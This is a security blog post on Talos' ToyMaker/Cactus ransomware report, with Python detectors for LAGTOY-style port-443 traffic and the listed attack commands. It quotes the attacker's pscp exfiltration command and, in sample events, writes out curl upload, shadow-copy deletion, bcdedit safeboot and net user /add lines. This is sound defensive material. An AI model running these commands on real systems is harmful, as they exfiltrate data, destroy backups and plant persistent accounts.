
Cisco Talos’ 2023 incident response report unveils the operations of “ToyMaker,” a financially motivated Initial Access Broker (IAB) whose behind-the-scenes activity opened the floodgates to a full-scale ransomware assault led by the infamous Cactus group.
The campaign began when Cisco Talos discovered that ToyMaker had exploited vulnerable, internet-facing systems to gain initial access. Using a custom backdoor called LAGTOY, ToyMaker moved stealthily through the compromised infrastructure:
“The initial access broker (IAB), whom Talos calls ‘ToyMaker’… deploys their custom-made backdoor we call ‘LAGTOY’ and extracts credentials from the victim enterprise.”
LAGTOY is a reverse shell implant with a raw-socket-based C2 connection over port 443 — deceptively not using TLS. Its purpose is straightforward: execute attacker commands, avoid detection, and persist as a Windows service under the name WmiPrvSV.
“LAGTOY is a simple yet effective implant… periodically reaches out to the hard-coded C2 server and accepts commands.”
Talos’ analysis highlighted the malware’s anti-debugging measures and time-based execution logic, designed to avoid scrutiny and optimize dwell time.
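The two LAGTOY traits the article singles out, a port-443 connection that never speaks TLS and persistence under a service name that imitates the legitimate WMI provider host (WmiPrvSE), both lend themselves to cheap checks. The script below is an added example written for this post, not code from Talos or from the report; the flow records, service names and the list of names worth protecting are constructed assumptions.

```python
"""Network and host heuristics for the LAGTOY traits described in the article.

Added example (not Talos code). Two checks:
  1. Port-443 flows whose first client bytes are not a TLS ClientHello.
  2. A service/process name within a small edit distance of a well-known
     Windows name (e.g. WmiPrvSE) without being that name.
All flow records and names below are constructed sample data.
"""
from dataclasses import dataclass
from typing import Iterable, List


def looks_like_tls_client_hello(first_bytes: bytes) -> bool:
    """True if the first client bytes form a TLS record carrying a ClientHello.

    Record header: content type 0x16 (handshake), version 0x03 0x00..0x04,
    two-byte length; the first handshake byte is then 0x01 (ClientHello).
    """
    if len(first_bytes) < 6:
        return False
    return (first_bytes[0] == 0x16
            and first_bytes[1] == 0x03
            and first_bytes[2] <= 0x04
            and first_bytes[5] == 0x01)


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    first_payload: bytes  # first bytes sent by the client


def non_tls_on_443(flows: Iterable[Flow]) -> List[Flow]:
    """Flows to port 443 whose opening bytes are not a TLS ClientHello."""
    return [f for f in flows
            if f.dport == 443 and not looks_like_tls_client_hello(f.first_payload)]


def _levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert/delete/substitute), used for lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


# Assumed list of names an implant might imitate; the real WMI host is WmiPrvSE.
LEGITIMATE_NAMES = {"wmiprvse", "winmgmt", "svchost", "lsass"}


def lookalike_service_name(name: str, max_distance: int = 2) -> bool:
    """True if the name is close to a well-known name but is not exactly that name."""
    n = name.lower()
    if n.endswith(".exe"):
        n = n[:-4]
    return any(n != legit and _levenshtein(n, legit) <= max_distance
               for legit in LEGITIMATE_NAMES)


# Constructed sample flows (198.51.100.0/24 is a documentation range).
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "198.51.100.20", 443, bytes.fromhex("160301009a010000960303")),  # real TLS ClientHello start
    Flow("10.0.0.7", "198.51.100.21", 443, b"whoami\r\n"),                            # plaintext command on 443
    Flow("10.0.0.8", "198.51.100.22", 80, b"GET / HTTP/1.1\r\n"),                     # plain HTTP on 80, ignored
]


if __name__ == "__main__":
    for f in non_tls_on_443(SAMPLE_FLOWS):
        print(f"non-TLS on 443: {f.src} -> {f.dst}: {f.first_payload[:16]!r}")
    for svc in ("WmiPrvSE", "WmiPrvSV"):
        print(svc, "lookalike" if lookalike_service_name(svc) else "ok")
```

The first check only needs the opening bytes of each flow, so it works on flow-capture exports as well as full packet captures; the lookalike check is deliberately loose (edit distance 2) and is meant to produce a short review list, not a verdict on its own.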
Credential harvesting was a key focus. Using tools like Magnet RAM Capture and PuTTY’s SCP utility (pscp), ToyMaker extracted credentials from memory dumps and exfiltrated them off-site with SCP over a non-standard port (53): pscp.exe -P 53 1.7z root@<Remote_IP>:/root
This was followed by three weeks of apparent inactivity, reinforcing the idea that ToyMaker’s business model stops at access acquisition:
“Based on the relatively short dwell time, the lack of data theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated ambitions.”
Almost a month after the breach, the handoff occurred. Cactus ransomware operators picked up the credentials left behind and initiated their own assault, complete with:
- PowerShell remoting scans via WSMAN.
- Deployment of remote access tools like AnyDesk, eHorus, RMS, and OpenSSH.
- Mass data exfiltration using 7-Zip and curl.
- Account creation for persistence (e.g., net user whiteninja <password> /add).
- Volume shadow deletion and Safe Mode reboots to disable defenses.
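The command-line artefacts in this post, the pscp transfer on port 53 from the credential-theft stage and the account creation, shadow-copy deletion, Safe Mode reboot and 7-Zip/curl staging from the Cactus hand-off, can all be matched on process-creation events. The scanner below is an added example written for this post, not detection content from Talos; the event lines are constructed, the documentation address 203.0.113.5 stands in for the article’s <Remote_IP>, and the exact vssadmin, bcdedit and curl forms are assumptions about how the listed actions are commonly carried out rather than commands quoted from the report.

```python
"""Process command-line heuristics for the TTPs listed in the article.

Added example (not Talos detection content). Each rule maps to one listed action:
  scp_nonstandard_port  pscp/scp with -P <port> where port != 22 (the -P 53 case)
  net_user_add          net user <name> <password> /add
  shadow_copy_delete    volume shadow deletion (vssadmin / wmic forms assumed)
  safeboot_set          Safe Mode reboot via bcdedit safeboot (assumed form)
  archive_staging       7-Zip archive creation
  curl_upload           curl with an upload/data flag
Sample events are constructed; 203.0.113.5 is a documentation address.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple


def _exe_name(cmd: str) -> str:
    """Executable name of a command line, without path or quotes, lowercased."""
    cmd = cmd.strip()
    if not cmd:
        return ""
    first = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(maxsplit=1)[0]
    return PureWindowsPath(first).name.lower()


def scp_to_nonstandard_port(cmd: str) -> bool:
    """pscp/scp invoked with -P <port> where the port is not 22."""
    if _exe_name(cmd) not in {"pscp.exe", "pscp", "scp", "scp.exe"}:
        return False
    toks = cmd.split()
    return any(t == "-P" and i + 1 < len(toks)
               and toks[i + 1].isdigit() and toks[i + 1] != "22"
               for i, t in enumerate(toks))


_REGEX_RULES: Dict[str, "re.Pattern[str]"] = {
    "net_user_add": re.compile(
        r"^\s*(?:\S*[\\/])?net1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "shadow_copy_delete": re.compile(
        r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "safeboot_set": re.compile(r"bcdedit(?:\.exe)?\s+/set\b.*\bsafeboot\b", re.I),
    "archive_staging": re.compile(r"\b7za?(?:\.exe)?\s+a\s", re.I),
    # case-sensitive on purpose: curl's -T (upload) differs from -t
    "curl_upload": re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:-T|--upload-file|-F|-d|--data)\s"),
}


def scan_events(events: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_label, command_line) pairs for every rule that fires."""
    hits: List[Tuple[str, str]] = []
    for line in events:
        if scp_to_nonstandard_port(line):
            hits.append(("scp_nonstandard_port", line))
        for label, rx in _REGEX_RULES.items():
            if rx.search(line):
                hits.append((label, line))
    return hits


# Constructed process-creation command lines; the last two are benign controls.
SAMPLE_EVENTS = [
    r'"C:\Program Files\PuTTY\pscp.exe" -P 53 1.7z root@203.0.113.5:/root',
    "net user whiteninja Passw0rd! /add",
    "vssadmin delete shadows /all /quiet",
    "bcdedit /set {default} safeboot network",
    r"7z a staged.7z C:\Users\finance\Documents",
    "curl -T staged.7z https://example.invalid/upload",
    "scp -P 22 backup.tgz admin@fileserver:/backups",
    "net user",
]


if __name__ == "__main__":
    for label, line in scan_events(SAMPLE_EVENTS):
        print(f"{label:22s} {line}")
```

None of these rules is conclusive alone (administrators create accounts and archive files too); their value is that the article’s sequence, a non-standard-port SCP transfer followed weeks later by account creation, shadow deletion and Safe Mode configuration on the same hosts, is distinctive when the hits are correlated by host and time rather than alerted on individually.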
“Cactus ransomware group takes its operational security seriously. They remove access to the file that contains the SSH private key…”
Notably, Cactus leveraged Metasploit-injected binaries and communicated over multiple ports, including 443, 8343, and 9232, showing advanced planning and resourceful use of open-source tools.
Talos stresses the need for updated threat modeling to capture compartmentalized but interconnected threats, such as IABs and ransomware gangs:
“The disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity conducted by Cactus requires that both threats be modeled separately.”
This case illustrates how financially motivated actors are outsourcing phases of an attack to maximize efficiency and minimize risk — a growing trend in the ransomware ecosystem.